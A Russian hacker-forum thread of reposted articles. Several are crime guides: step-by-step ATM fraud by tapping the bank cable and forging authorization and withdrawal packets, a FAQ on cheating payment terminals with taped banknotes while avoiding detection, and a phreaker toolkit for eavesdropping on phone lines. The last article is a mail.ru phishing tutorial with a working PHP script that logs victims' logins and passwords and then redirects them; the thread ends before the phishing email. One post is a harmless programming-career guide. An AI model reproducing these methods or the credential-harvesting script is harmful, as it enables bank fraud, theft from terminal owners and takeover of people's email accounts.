Введение в Интернет и безопасность в нем

Расширенная информация об игровой Вселенной.
Kestrel
Активный участник
Сообщений: 3552
Зарегистрирован: 26 дек 2010, 12:22

Сообщение Kestrel » 04 апр 2009, 23:44

ШурСтраКос - это не только веб-кулхацкер, но еще и кулфрицкер =). Вашему вниманию представляется статья на тему фрикинга.
<span style="font-size: 18px"><!--coloro: red-->[color= red]<!--/coloro--><span style="display: block; text-align: center">Секреты взлома банкоматов<!--colorc-->[/color]<!--/colorc--></span> </span>
<span style="font-style: italic">Автор статьи - ph1l1ster с xaker.ru</span>
<span style="display: block; text-align: center"><!--coloro: yellow-->[color= yellow]<!--/coloro-->Intro.<!--colorc-->[/color]<!--/colorc--></span>
Банковские автоматы и кредитные карточки уже давно появились на улицах больших городов и постепенно начинают входить в нашу жизнь. Что есть банкомат с точки зрения хакера? Правильно, источник халявы и быстрого способа заработать немного карманных деньжат. Ведь если украсть десяток-другой долларов, кто будет вас искать?
По словам банковских работников, оправданными с финансовой точки зрения будут поиски похитителя, умыкнувшего в свой карман по крайней мере 300 вечнозеленых.
Уменьшим эту цифру вдвое для безопасности и примем полученные полтораста баксов в качестве того потолка, заходить за который не стоит даже в том случае, если очень-очень хочется купить новый микропроцессор или материнскую плату, а к ним быстрый модем впридачу.
Впрочем, с юридической точки зрения похищение даже одного доллара - кража. Поэтому, прежде чем отправляться к ближайшему банкомату с кусачками и отверткой, запаситесь на всякий случай парой адвокатов и захватите Шварценеггера на тот случай, чтобы немножко попридержать службу безопасности банка, пока вы будете сматывать удочки. Для того чтобы получить деньги, мало найти потерянную карточку и вставить ее в прорезь автомата. Нужно ввести с клавиатуры определенный код, на карточке не написанный и хранящийся у клиента в голове
Сама по себе карточка без него бесполезный кусок пластика. К тому же ее бывший владелец, как только обнаружит пропажу, немедленно позвонит в банк, и у карточки будет выставлен знак изъятия. Другими словами, она исчезнет в недрах банкомата и уже больше никогда не попадет к вам в руки. Следовательно, нужно не только найти карточку, но еще и подсмотреть вводимый ее владельцем пароль и снять со счета требуемую сумму еще до того, как тот обнаружит пропажу.
Впрочем, если мы уж сумели подсмотреть пароль, то и карточку воровать совершенно необязательно. Достаточно ее считать. Что и сделали в свое время ребята из Эстонии. История шумная и известная почти каждому кардеру. В дорогих ресторанах официант, пока нес карточку клиента, успевал ее считать портативным устройством размером с пачку от сигарет, изготовленным из обычной магнитофонной головки, батарейки, усилителя сигналов и записывающего устройства. Ошибка горячих эстонских парней заключалась в том, что они грабили часто и помногу. Другими словами, в жадности.
А вот в другой истории злоумышленникам повезло больше. Как-то раз на малолюдной улице одного небольшого городка появился новый банкомат. Естественно, нашлись такие, что пожелали им воспользоваться. Опускают в него карточку, вводят нужный пароль. Ждут себе ждут, а банкомат им отвечает: извините, мол, нету денег или связи - в общем, выдает неподозрительное объяснение невозможности выдачи денег. В банке долго понять не могли - как совершается кража? Почему-то никому и в голову не могла придти мысль, что этот банкомат-то липовый и установлен злоумышленниками специально для чтения карт и запоминания паролей. Позже его демонтировали, но злоумышленников, кажется, так и не нашли. За полтора года (а именно столько он умудрился простоять) кардеры перекачали на свой счет немалую сумму. Однако же рядовой хакер скорее найдет оброненную кем-то впопыхах тысячедолларовую купюр, чем завалявшийся на свалке банкомат. Может быть, есть способ попроще?
Есть, но для этого потребуется умение держать паяльник в руках, чтобы смастерить себе некий хардваринговый девайс, а также разбираться в сетевых протоколах на канальном уровне. Идея проста до безобразия: поскольку банкомат в себе не хранит никакой информации и всегда обращается за ответом в банк, то можно, врезавшись в кабель между ним и банком, перехватить трафик и фальсифицировать его нужным нам образом. Ни один банк не в состоянии гарантировать целостность кабеля на всем его протяжении.
Разумеется, для анализа протокола обмена понадобится персональный компьютер, а также программа для снятия дампа и представления его в удобочитаемом виде. Можно, к примеру, воспользоваться компактной и маленькой утилитой pio и навигатором управления bleak_l, заботливо написанным хакером КРМС для взлома НТВ, но вполне подходящим и для этого случая.
Единственное, что придется спаять самостоятельно, так это контроллер для подсоединения к банковскому кабелю. В Сети очень много различных схем и энтузиастов, предлагающих за относительно небольшие деньги приобрести уже готовые изделия. Так или иначе, но в дальнейшем будем считать, что такой девайс у нас есть.
<span style="display: block; text-align: center"><!--coloro: yellow-->[color= yellow]<!--/coloro-->Приступаем к делу!<!--colorc-->[/color]<!--/colorc--></span>
Ну вот. Обзаводимся ноутом, сниффером, шварцнегером и адвокатом на всякий случай [img]/images/smilies/wink.gif[/img]
1. Врезаемся в линию между банкоматом и авторизационным центом (заметим, что врезаться придется в разрыв кабеля, так чтобы вы в дальнейшем могли не только перехватывать, но и блокировать любые проходящие пакеты). Разумеется, что если мы хотя бы на мгновение прервем целостность кабеля, дело закончится плачевно. Поэтому поищите в книжках электронные схемы мгновенной коммутации "на ходу". Аналогичным образом мошенники нейтрализуют сложные системы электронных сигнализаций. Не тех, что в магазинах, а на порядок совершеннее.
2. Наблюдаем за пересылкой пакетов, не предпринимая никаких действий. Только наблюдаем, чтобы понять логику. На самом деле это "только" представляет собой утомительный и кропотливый анализ протоколов и расшифровки всех полей заголовков пакетов с той целью, чтобы в дальнейшем иметь возможность генерации и отправки собственных пакетов, не опасаясь того, что они чем-то будут отличаться от реальных.
3. Теперь манипулируем легальной картой (это значит, что по крайней меру одну карту вы должны будете все же завести) с тем, чтобы понять логику обмена. В частности, найти и опознать передаваемые банкоматом запросы и возвращаемые ему ответы.
4. Сравним теперь это с просроченной картой, чтобы определить реакцию системы в такой ситуации, а также найти и идентифицировать коды ошибок (они нам потом понадобятся).
5. Наконец, тяпнем по маленькой для храбрости и, оставив Шварценеггера на шухере, начнем процесс. Засовываем нашу карту, на счету которой лежат оставшиеся после экспериментов с банкоматом несколько долларов.
6. Наблюдаем, как банкомат шлет запрос, включая номер нашего счета и все остальное. Мы никак не вмешиваемся в этот процесс.
7. Авторизационный центр должен вернуть ответ, в котором содержится много полезной информации. А среди нее - максимально возможная сумма для снятия. Вот тут мы перехватываем этот пакет и взамен него шлем другой Чем он отличается от оригинального, не стоит, наверное, даже говорить - и так всем ясно. Но будьте внимательны! Эта сумма может присутствовать сразу в нескольких полях, кроме того, необходимо скорректировать и поле контрольной суммы, иначе ничего не получится! Это самый сложный момент во взломе.
8. Впрочем, на этом этапе вы еще ничем не рискуете. Если ошибетесь, то просто перехватите обратный ответ банкомата и не пропустите его. Ведь вы еще помните коды ошибок, не так ли? А поэтому пробуйте, пока банкомат не "проглотит" фальсифицированный пакет.
9. Ну что же, теперь требуйте от банкомата столько денег, на сколько у вас хватит совести. В это время банкомат передает банку, сколько денег было снято. Взаправду. Эту информацию надо перехватить и послать ложный пакет, что денег снято всего 1 доллар (или сколько у вас там осталось взаправду на карточке). Будьте очень внимательны. Теперь фальсифицированный пакет передается уже банку, и любое неверное действие будет необратимо зафиксировано системой безопасности, и даже Шварценеггеру скоро покажется жарковато.
10. Ну вот и все. Осталась маленькая проблема - как обеспечить сходимость дебета и кредита. Ведь банкомат ведет логи и протоколы всех действий. Подумайте, как можно обмануть систему.
11. Наконец все! Вы отсоединяете свой ноутбук от кабеля, по возможности замаскировав нелегальное подключение, и отправляетесь в ближайший компьютерный салон за новым микропроцессором.
12. Однако помните, что многие банкоматы сейчас снабжены контрольными телекамерами, что не есть хорошо. Но к счастью, еще не все И стальная крыса всегда найдет для себя щель!
<span style="display: block; text-align: center"><!--coloro: yellow-->[color= yellow]<!--/coloro-->Послесловие<!--colorc-->[/color]<!--/colorc--></span>
А вообще, чтобы ломать банкоматы, неплохо бы разобраться в их устройстве, типовом протоколе обмена и программном обеспечении То есть так или иначе выбрать себе работу, связанную с их разработкой, созданием или по крайней мере эксплуатацией В этом случае вы получите действительно достоверную информацию об их устройстве, а также слабых и сильных сторонах А ведь уязвимость у них действительно есть Только она неочевидна для постороннего, не работавшего с ними человека. Но как и любому человеческому творению, этому свойственны недостатки не в меньшем числе.

Kestrel
Активный участник
Сообщений: 3552
Зарегистрирован: 26 дек 2010, 12:22

Сообщение Kestrel » 05 апр 2009, 13:47

Ну, статья не моя, а тебе на слово я поверю). Слушай, а если я сниму с чужой кредитки 499 рублей - тогда будет считаться, что преступления не было?)

Kestrel
Активный участник
Сообщений: 3552
Зарегистрирован: 26 дек 2010, 12:22

Сообщение Kestrel » 05 апр 2009, 18:02

А разве нигде не фиксируется, сколько денег было на счету и сколько было снято? О_о

Kestrel
Активный участник
Сообщений: 3552
Зарегистрирован: 26 дек 2010, 12:22

Сообщение Kestrel » 08 апр 2009, 16:18

<span style="font-size: 18px"><!--coloro: red-->[color= red]<!--/coloro--><span style="display: block; text-align: center">FAQ по многоразовой купюре (универсалке)<!--colorc-->[/color]<!--/colorc--></span></span>
<span style="font-style: italic">Автор статьи - DeaDevil с ][aker.ru</span>
q) зачем мне многоразовая купюра (универсалка)?
a) для того чтоб использовать аппарат в целях пополнения баланса мобильного телефона, не тратя финансы
q) а как она выглядит ?
а) это обычная купюра высокого достоинства (100-5000 рублей) с наклееными по краям линиями скотча (они же шлейфы)
q) а какая длина у шлейфа?
а) 30 см - не прогадаешь.
q) скотч липнет к аппарату, что делать ?
а) не забывай , что за пределами купюры - скотч липнет сам к себе, так как он свёрнут вдвое !!!.
q) какие аппараты подходят для данного действия ?
а) а так сразу и не узнаешь - надо тестить.
q) как провести тест ?
а) необходимо использовать тестовую купюру, она выглядит как обычная купюра достоинством в 10 рублей с диагонально наклееным куском скотча с одной стороны купюры, хотя также возможно проводить тест с купюрой , на которой скотч с 2-х сторон.
q) а почему тестовая купюра должна выглядеть именно так?
а) да потомучто создатели аппаратов для пополнения счёта тоже не глупцы, в них давно присутствуют отражатели, тесты на края купюры, и многие другие подводные камни.
q) что если тестовая купюра не принялась ?
а) это говорит о том что в аппарате есть отражатель, попробуй использовать матовый скотч на универсалке, можешь налепить его на обычный сверху, так больше шансов вытащить купюру.
q) у меня принялась тестовая купюра, а универсалка выплёвывается, что это значит?
а) это значит , что в данной машинке стоит тест на края купюры, необходимо либо сделать надрезы у края, либо похитрить как на картинке...
q) а как не спалиться ?
а) есть техника безопасности, так как тебе на тест и пополнение счёта необходимо примерно 10-15 минут (а первый раз ещё боьше) - необходимо найти аппарат который собирает редко очередь более 2х человек и прийти к нему ночером , часика в 3-4...
q) а что если аппарат не принимает купюру даже с матовым скотчем ???
а) я предложу тебе забить на этот аппарат и искать другой, хотя меня бы он заинтересовал, я бы им плотно занялся и фрикнул. хотя сознаюсь ... фрикается не всё, не могу понять что там тест.(подозрения есть проведу тест - напишу)
q) а можно использовать нитки или леску ?
а) если ты гуру, можешь юзать хоть пылесос, я всего раз использовал леску, как результат - изорваный фиолет (500р, благо в банке приняли и поменяли)
q) если меня поймают я сяду ?
а) есть все шансы, мошенничество... как таковой статьи по фрикерству нету, но есть много статей куда попадает данное действие.
q) каждый день же идёт пересчёт купюр, спалят что моей не хватает и по номеру узнают что и где !!!
а) глупо, там лежит примерно 5к, половина из них 10рублёвки, и вдруг не хватает 500 рублей ... ну как возможно понять, что это именно ты ? подозреваемых сотни, а ещё возможен баг машины (лично видел как машина выплюнула купюру после того как тип оплатил и ушёл) . клади раз в месяц (2 месяца), и заведи несколько автоматов.
q) я вставил купюру без теста, а её зажевало и не отдаёт, чё делать в таком случае ?
а) надеюсь тебя твоё "без теста" чему-нибудь научит... ну чё, дёргай со всей силы шины на себя и иди оттуда (есть 3 варианта 1-купюра выдернется целой 2-рваная купюра 3-вырвется тока шина : 1-в карман 2-в банк на обмен 3-мвахахахаха)
q) а можно ли создать такую купюру, что будет подходить ко всем аппаратам ?
а) да можно, но это что-то ювелирное, я думаю что моя купюра почти стала таковой.
q) а можно оплачивать что-нибудь ещё, кроме телефона ?
а) хм... это вопрос достойный напряга мысли... думаю да, надо посмотреть. тестите, если прокатит - флаг в руки...
q) чем отличается тест-купюра со скотчем с одной стороны и с 2-х сторон ?
а) тем что можно найти положение отражателя относительно купюры одинарой клейкой и вообще обнаружить его наличие двойной.

Kestrel
Активный участник
Сообщений: 3552
Зарегистрирован: 26 дек 2010, 12:22

Сообщение Kestrel » 08 апр 2009, 23:58

<span style="font-size: 18px"><!--coloro: red-->[color= red]<!--/coloro--><span style="display: block; text-align: center">Чемоданчик фрикера<!--colorc-->[/color]<!--/colorc--></span></span>
<span style="font-style: italic"><span style="font-size: 14px">Автор статьи - f02 с ][akeр.ru</span></span>
Все свое ношу с собой
Стать крутым фрикером - мечта многих ребят. Мне часто приходят письма с вопросами, как стать фрикером, мол, научи и т.п. Вот я и решил сделать серию статей по этой тематике. Начну с чемоданчика фрикера. Это тот необходимый каждому телефонному пирату набор, который он должен всегда носить с собой. Даже когда идет на свидание с девушкой.
Необходимый набор
Определим, что же фрикеру ХХI века необходимо носить с собой. Нижеследующий перечень не претендует на классический образец для подражания, однако мне кажется, что он будет весьма полезен начинающим. Итак, вот он.
Трубка монтажника
Мобильный телефон
Универсальный нож (пассатижи, отвертки и т.п.)
Провода, «крокодилы»
Мультиметр
Газовый паяльник
КПК с RS-232 (например, Palm m100)
Модем
Ноутбук
Набор флюсов и припоев
Изолента
Разные боксы и всякая полезная мелочь
Прямые руки
Acoustic coupler
Набор фрикерских отверток
Контроллер/программатор
Разводной ключ
Рассмотрим некоторые пункты этого списка более подробно. В зависимости от степени нужности рядовому фрикеру того или иного устройства я ставил ему оценку в баллах, от одного до десяти.
<!--coloro: aqua-->[color= aqua]<!--/coloro-->Трубка монтажника<!--colorc-->[/color]<!--/colorc-->
Оценка: 8 баллов
Цена: $70 или самодел
Этот девайс просто необходим фрикеру, звонящему за чужой счет и любящему послушать разговоры соседей. В купе со встроенным антиАОНом и Rock BOX может стать грозным орудием подстав. Если делать его лень, то вполне можно купить в специализированных магазинах.
Плюсы девайса: можно юзать везде, где есть телефонная линия; весьма мобилен; имеет ряд полезных функций; подвластен расширению в умелых руках.
Минусы: трубка занимает много места - если с ней возьмут, то не сможешь прикинуться домкратом и сказать, что проходил мимо.
<!--coloro: aqua-->[color= aqua]<!--/coloro-->Универсальный нож (ЛП)<!--colorc-->[/color]<!--/colorc-->
Оценка: 10 баллов
Цена: $5-15
Эта вещь должна быть с тобой везде и всегда, даже если ты не фрикер. Быстро разобрать любой девайс, согнуть толстый провод, перекусить провода, что-то подточить, обжать, колбаску порезать, пырнуть кого-нибудь - да мало ли еще у него применений. Скажу одно, с этим ножиком я не расстаюсь никогда и ни капли не жалею о его приобретении.
Плюсы: может иметь встроенный набор разнообразных отверток, иногда поставляется в виде молотка, пассатиж и даже гаечного ключа.
Минусы: сходит за холодное оружие и может вызвать проблемы (хотя я проблем с ним не имел).
<!--coloro: aqua-->[color= aqua]<!--/coloro-->Мультиметр<!--colorc-->[/color]<!--/colorc-->
Оценка: 6 баллов
Цена: $5-30
Универсальный измерительный прибор должен находиться в портфеле каждого настоящего гуру. С ним легко потестить любое устройство, разобраться, где неполадка в девайсе. В купе с газовым паяльником, небольшим набором деталей или процессорной платой может стать просто полноценным выносным фрикерским комплексом.
Плюсы: с помощью него можно измерять громадное количество параметров, в зависимости от модели; позволяет прозванивать провода, определять обрывы и различные неполадки.
Минусы: во многих ситуациях абсолютно бесполезный, занимающий место ящик.
<!--coloro: aqua-->[color= aqua]<!--/coloro-->Газовый паяльник<!--colorc-->[/color]<!--/colorc-->
Оценка: 10 баллов
Цена: $15-50
Паяльник - неизменный спутник фрикера. Но любому паяльнику, даже самому современному, нужна розетка. А если ты на полевых работах и питание достать ой как сложно, то тебя всегда выручит газовый паяльник. С ним ты можешь даже в дороге собрать любой прибор или, наконец, починить свои наушники.
Плюсы: полная независимость от электроэнергии; можно использовать для резки пластмассы, для усаживания термоусадки и прочих вещей, где нужна высокая температура.
Минусы: весьма громоздкий, требует постоянной дозаправки газом; можно обжечься.
КПК
Оценка: 7 баллов
Цена: $30-700
Если ты крутой гуру программирования, умеешь кодить под КПК и владеешь интерфейсами этого девайса, то эта штука - для тебя. В купе с прямыми руками и хорошими мозгами с этим устройством ты сможешь свернуть горы покруче, чем в самых лучших фильмах про хакеров. К нему можно цеплять модемы или мобильные телефоны и хакать прямо из метро.
Плюсы: можно найти КПК с х86-архитектурой (как на фото), с нормальным интерфейсом RS-232 и цеплять к нему любые устройства, понимающие этот интерфейс.
Минусы: в руках новичка будет бесполезной игрушкой, которая может еще и повредить делу.
<!--coloro: aqua-->[color= aqua]<!--/coloro-->Acoustic coupler<!--colorc-->[/color]<!--/colorc-->
Оценка: 3 балла
Цена: Сделать самому или найти у старьевщиков
Акустический соединитель был основным инструментом хакеров 80-90-х в США. В наши дни вымирающий девайс. Может быть полезен при взломе с таксофонов (зачем, есть же GPRS), либо для анонимной отправки факса.
Плюсы: ретродевайс, может служить атрибутом моды у фрикеров; позволяет вести соединения практически с любых телефонов; вместе с радиотелефоном образует радиомодем.
Минусы: необходимо специально хитро настраивать модем; очень низкая скорость соединения (скорее всего не удастся выжать больше 14400); занимает много места; требует дополнительного питания; морально устарел.
<!--coloro: aqua-->[color= aqua]<!--/coloro-->«Повелитель телевизоров»<!--colorc-->[/color]<!--/colorc-->
Оценка: 5 баллов
Цена: $15
Ты любишь смотреть телик? Я терпеть не могу - когда вижу работающий ящик, судорожно ищу пульт, чтобы вырубить это слив. Теперь у тебя есть отличная возможность, не ища пульт, а достав брелок от ключей, вырубить любой телик. Торгуют этим супердевайсом тут: www.tvsetoff.com. С этим устройством ты сможешь некисло веселить друзей, прогуливаясь по торговым центрам и нажатием всего одной кнопки гася сотни теликов.
Плюсы: миниатюрность, легкость использования; подходит практически для всех типов телевизоров; являясь универсальным выключателем, может очень повеселить.
Минусы: не очень хорошая сборка, при наличии прямых рук и небольшого количества времени можно сделать самому.
<!--coloro: aqua-->[color= aqua]<!--/coloro-->Процессорная плата<!--colorc-->[/color]<!--/colorc-->
Оценка: 7 баллов
Цена: $15-300
Настоящий фрикер делает многие эмуляторы на микроконтроллерах, разводя при этом плату и паяя множество устройств. Что мешает ему прикупить такую процессорную плату под фаворитный ему контроллер и делать эмуляторы в дороге с ноутбука и КПК. Можно построить свой универсальный фрик-девайс, имеющий тысячи функций. А можно использовать как логический анализатор, в купе с КПК или лэптопом. В общем, бесценная штучка за копеечные деньги.
Плюсы: число возможных функций платы зависит только от твоей фантазии и кошелька. С ней можно делать громадное количество различных взломов, снятия логов, похищать пароли, вводимые с клавиатуры, делать ключи-карты – короче, всего не перечислишь.
Минусы: будет полезна только в опытных руках, при неплохом знании электроники и программирования. В руках новичка – бесполезный кусок пластика.
<!--coloro: aqua-->[color= aqua]<!--/coloro-->Разводной ключ<!--colorc-->[/color]<!--/colorc-->
Оценка: 1 балл
Цена: $15-300
Это, наверное, самый нефрикерский девайс в нашем обзоре. Но он будет полезен при попытке открутить какое-нибудь устройство, например таксофон, для дальнейшего исследования. А можно и двинуть гопам по мордасам, если докопаются до крутого фрикера при занятии любимым делом.
Плюсы: выглядит стильно и внушительно. Идя по темным улицам, испытываешь уверенность, помня, что он с собой. Имеет множество полезных и бесполезных функций. Может стать очень «весомым аргументом» в неудавшемся разговоре.
Минусы: вполне сходит за холодное оружие, занимает много места и достаточно тяжелый.
Набор миниатюрных отверток
Оценка: 9 баллов
Цена: $3-15
Если ты часто раскручиваешь утонувшие мобилы, лэптопы, фотоаппараты и прочие мелкие электронные девайсы, и притом везде и всюду, то этот набор просто обязан стать твоим постоянным спутником. Коллега оставит свой ноут без присмотра, и ты в тот же миг сделаешь ему электронное западло .
Плюсы: позволяет вскрыть множество хитрых электронных устройств.
Минусы: подходит только для мелких винтиков, но это полностью компенсируется наличием фрикерского ножа.
Итог

Я перечислил лишь небольшую часть из того, что может понадобиться истинному телефонному пирату. Каждый составит свой список, под конкретные цели и задачи. Главное - помнить, что чем сложнее сеть становится, тем больше уязвимостей у нее появляется. Надо только уметь их находить. Удачи, фрикер!

Изготовление акустического соединителя

Простейший акустический соединитель может сделать каждый из нас. Для его изготовления потребуется трубка от старого совкового телефона, где есть угольный микрофон и динамик. Разбираем трубку. Там будут хитро соединены микрофон и динамик, нужно их соединить последовательно с девятивольтовой батарейкой и шнурком с разъемом, который будет вставлен в модем (смотри схему). То есть так: разъем –> микрофон –> динамик –> батарейка –> разъем. Полярность батарейки роли не играет.

Kestrel
Активный участник
Сообщений: 3552
Зарегистрирован: 26 дек 2010, 12:22

Сообщение Kestrel » 11 апр 2009, 12:06

<span style="font-size: 18px"><!--coloro: red-->[color= red]<!--/coloro--><span style="display: block; text-align: center">Как стать программистом<!--colorc-->[/color]<!--/colorc--></span></span>
<span style="font-style: italic">Автор статьи - nerezus с forum.antichat.ru</span>
Введение.
Эта статья не про выбор первого языка(несмотря на самый большой пункт тут).

1) А надо ли мне это?

действительно, советую хорошо подумать
Кто-то из KISS говорил примерно такое по смыслу "Если кто-то говорит, что он взял гитару и играет ради музыки, а не для того, чтобы заваливать телок, то это гон, можете плюнуть ему в лицо!" Тут заменяем телок на стабильные(хоть и небольшие) деньги, а музыку на кодинг =)

2) Для чего?

Собственно вопрос с подвохом. Ибо правильно ответят лишь немногие(и это будет совпадением).
А дело в том, что человек сам не знает, чего хочет. Да и как правило одним языком не заканчивается.
3) Определение первого языка для обучения. Эта часть займет около пары часов.
Есть 2 варианта: взять актуальный язык, либо язык типа паскаля или бейсика: которые не применяются.
Кто-то может возразить: мол Delphi или VB.NET. Разочарую их: Delphi и паскаль не имеют ничего общего кроме небольшого сходства в синтаксисе. Для VB.NET и BASIC оно и того меньше. И подходы в программировании абсолютно разные. Это все равно, что изучать C++, начав с книги по C. Но об этом поподробнее потом.
Однако хочу дать заранее совет: не стоит начинать с низкоуровневых вещей, т.к. при обучении программированию придется уделять не только алгоритму, но еще и работе с указателями, выделением памяти и прочими "вкусностями". Именно этим "страдают" C/C++/asm. Поэтому я бы не рекомендовал начинать с них - наверстать можно будет и потом(ну если конечно это будет нужно).
Итак, что у нас остается: Java, .NET(C#, VB.NET и подобные языки, распространено в основном в США), Delphi(только в бывшем СНГ, на общемировой арене это очень редкий зверь). и скриптовые языки: Python, Ruby, Perl. Так же существует PHP, однако для его изучения надо уже иметь теоретические(и желательно практические) знания о работе веба, многие этому не следовали, а что из этого получалось, можно узнать на phpclub.ru, посмотрев на тупейшие вопросы в основном разделе их форума).
Сам бы я посоветовал Python или бейсик. Кстати их объединяет одинаковая типизация: dynamic, strong. Кстати хочу заметить, что именно strong типизация позволит минимизировать количество логических ошибок.
Языки со strong-типизацией: Java, C++(именно C++, а не C), .NET языки, Python, basic, ruby, delphi. У C, Perl, PHP типизация weak(слабая).
Подробнее читать про конкретный язык в википедии(wikipedia.org).
4) Итак язык выбрали, с чего начинать?
С самого начала. По мере изучения языковых конструкций пробуем применять их на практике. это не сложный этап, однако именно на нем отсеивается большинство. И проблема с нехваткой материала для тренировок. Пример задачки(задача 1) можно увидеть в приложениях.

5) Допустим, выучили мы синтаксис.

Ну или почти выучили. Ведь некоторые языки типа бейсика, C, Pascal или Java можно выучить(имеется ввиду только синтаксис, причем без magic-фишек) очень быстро. Но вот научиться применять его - намного сложнее.
Эта часть похожа на изучение поведения сферического коня в вакууме. Потому что на примерах ее изучить практически нельзя. Отложим этот этап.
Итак, добро пожаловать в реальный мир!
6) Чем отличается реальная задача от задачи из задачника?
Правильно, тем, что она реальная. Для примера возьмем такую: написание программы для сортировки мейлов в файле. С графическим интерфейсом.
Что понадобиться знать? Работу с файлами, работу с GUI. Изучаем. Пишем. И перед нами уже начинает возникать проблема. Подробнее о ней немного дальше.
И именно на этом этапе начинаем изучать стандартные библиотеки языка/технологии. и не только стандартные.
Кстати, на этом этапе уже можно начинать зарабатывать. Однако качество продуктов будет хреновое
Решаем задачу 2(в приложениях).
7) Насчет проблем из пункта 5. Если работу с файлами можно сделать по принципам структурного подхода, то уже работа с GUI в этом стиле будет сплошным мучением. Итак, изучаем ООП. Именно практическую часть, т.к. в пункте 4 теория уже была выучена. Этап занимает достаточно много времени.
Именно по этой причине я не советовал начинать C++ с C, а Delphi с паскаля: переучиваться будет сложнее, чем начинать заново.
То есть учим теорию: ООП(нужно много практики), которая плавно перейдет в ООД, естественно надо будет знать паттерны, UML, принципы разработки и т.д.
Так же больше работаем на практике: регулярные выражения, работа с БД и SQL, GUI, сокеты, высокоуровневые протоколы, такие как HTML, FTP и всякие xmlrpc и SOAP, набор технологий XML и прочие.
Решаем задачу 3(на выбор).
8) Что дальше?
Совершенствуем свои навыки. Ты уже будешь сам знать, что тебе дальше делать.
P.S. Хочу заметить, что литературы на русском языке для тебя станет не хватать. Вообще. Так что знание английского обязательно. Именно обязательно, а не желательно.

И пару нюансов:

1) Практически для всех языком имеются свободные рабочие места. Ну кроме раритетных или специфических.
2) И вообще, если заказчику нужен готовый продукт, то ему, как правило, монопенисуально, на чем написан продукт.
3) У каждого языка своя направленность. Поэтому тупо применять к примеру PHP для написание клиентских приложений с GUI, а на ассемблере писать сайты или СУБД.
4) Заработок не зависит от языка/технологии, а только от уровня профессионализма.
5) А если занимаешься низкоуровневым программированием, то про ООП - не на твой счет.
6) Есть такое заблуждение: "Программист - это тот, кто умеет составлять алгоритмы". Так вот: умение составлять алгоритмы - требование обязательное, но не достаточное, на этом дальше 5 пункта(в этом обзоре) не уедешь.
Приложения:
Задача 1 (уровень: продвинутый школьник)
Старая задачка, обычно на школьных олимпиадах ее дают:
Имеется матрица (n*m) заполненная 1 и 0. Единицы - это острова, а нули - море. Если единицы находятся рядом по горизонтали или вертикали - то они образуют один остров. Найти количество островов.
P.S. Естественно могут быть "гнутые" и "дырявые" острова.
P.P.S. Как не странно, но решают ее редко, хотя она достаточно легкая.
Задача 2 Написать аналог wget.
Задача 3A Написать BB-парсер. Естесвенно не тупой подстановкой регекспов.
Задача 3Б Интерпретатор/HTTP-сервер/etc на выбор.

Kestrel
Активный участник
Сообщений: 3552
Зарегистрирован: 26 дек 2010, 12:22

Сообщение Kestrel » 11 апр 2009, 20:32

<span style="font-size: 18px"><span style="display: block; text-align: center"><!--coloro: red-->[color= red]<!--/coloro-->Взлом почты на mail.ru [СИ]<!--colorc-->[/color]<!--/colorc--></span></span>
<span style="display: block; text-align: center"><!--coloro: yellow-->[color= yellow]<!--/coloro-->[::.INTRO.::]<!--colorc-->[/color]<!--/colorc--></span>
<span style="font-style: italic">Автор статьи - Chaak с forum.antichat.ru</span>
Привет! В этой статье я буду повествовать о том, как взломать почтовый ящик на бесплатном почтовом сервисе mail.ru.
Статья предназначена для новичков, в СИ, а также для любого пользователя интернета, имеющего желание получить доступ к чужому аккаунту.
Но ладно не буду об этом долго писать и так понятно "зачем нужнен почтовый ящик взломщику ", сами поймете.
<em class="bbuline">Статья сгодится для новичков. Гуру просьба не читать.</em>
<span style="display: block; text-align: center"><!--coloro: yellow-->[color= yellow]<!--/coloro-->[::.PREPARATION.::]<!--colorc-->[/color]<!--/colorc--></span>
Для начала нам понадобится бесплатный (лучше платный) хостинг с поддержкой PHP.
Можно зарегистрироваться на любом из этих:
<span style="font-size: 8px">*только заранее убедитесь что хостинг поддерживает PHP</span>
<div class="code-box"><strong class="legend">Код:</b><div class="blockcode"><div class="scrollbox" style="height: 35em"><pre>km.ru nextmail.ru hobby.ru webrise.ru lapin.ru free.dl-hosting.ru hostow.net beplaced.ru 777host.ru paltus.ru miraclehost.ru freebox.ru alfaspace.net k70.ru hosting.promostudio.ru chat.ru maxhost.ru nixup.com e2e.ru noka.ru newmail.ru boom.ru h15.ru hut.ru jino-net.ru pochta.ru unlimhost.ru onepage.ru by.ru sbn.bz yard.ru domainhosting.ru orthodoxy.ru webservis.ru ru-web.net activehost.ru househost.ru bestof.ru addr.ru hosting.dump.ru pesni.ru medbox.ru fatal.ru x5x.ru hopshot.com 5gigs.com wagoo.com orgfree.com awardspace.com bobos.ca www.host.sk zportal.info spaceall.de 3x.ro sretenie.ru dotgeek.org sevhosting.net o2g.netwww.jino-net.ruwww.nixup.comnewmail.ruho.com.ua/wallSt.ruhut.ruholm.rue2e.rufatal.ruhost.skut.ruH1.ruHostmos.ruWebm.ruRdcom.runa
rod.rufront.runm.ru chat.ru boom.ru by.ru</pre></div></div></div>Зарегистрировали? - идем дальше!
Что нам нужно:
Во-первых нам нужен сниффер(это скрипт, позволяющий сохранять принимаемые данные в текстовый файл):
<div class="code-box"><strong class="legend">Код:</b><div class="blockcode"><div class="scrollbox" style="height: 18em"><pre><?php$f=fopen("mail.txt","at"); # файл куда сохранятьflock($f,2);fputs($f,$_GET['Login']."@"); #логинfputs($f,$_GET['Domain']); #доменfputs($f,";".$_GET['Password']."n"); # парольflock($f,3);fclose($f);?><script>document.location.href="http://win.mail.ru/cgi-bin/readmsg?id=121112312";</script></pre></div></div></div>Рассмотрим скрипт поподробнее:
<div class="code-box"><strong class="legend">Код:</b><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre><script>document.location.href="http://win.mail.ru/cgi-bin/readmsg?id=121112312";</script></pre></div></div></div>Это строка определяет, то место, куда мы будем перенаправлять пользователя после авторизации на <!--coloro: red-->[color= red]<!--/coloro-->письме-фейке.<!--colorc-->[/color]<!--/colorc-->
    * Сохраним в файл mes.php и зальем на хостинг.
    * Также создадим в дирректории со скриптом файл mail.txt, и выставим на него права(chmod) 777
Пожалуй с хостингом - все!
Приступим к самому письму, которое мы будем отправлять жертве на мыло.
Код<!--coloro: red-->[color= red]<!--/coloro--> письма:<!--colorc-->[/color]<!--/colorc-->
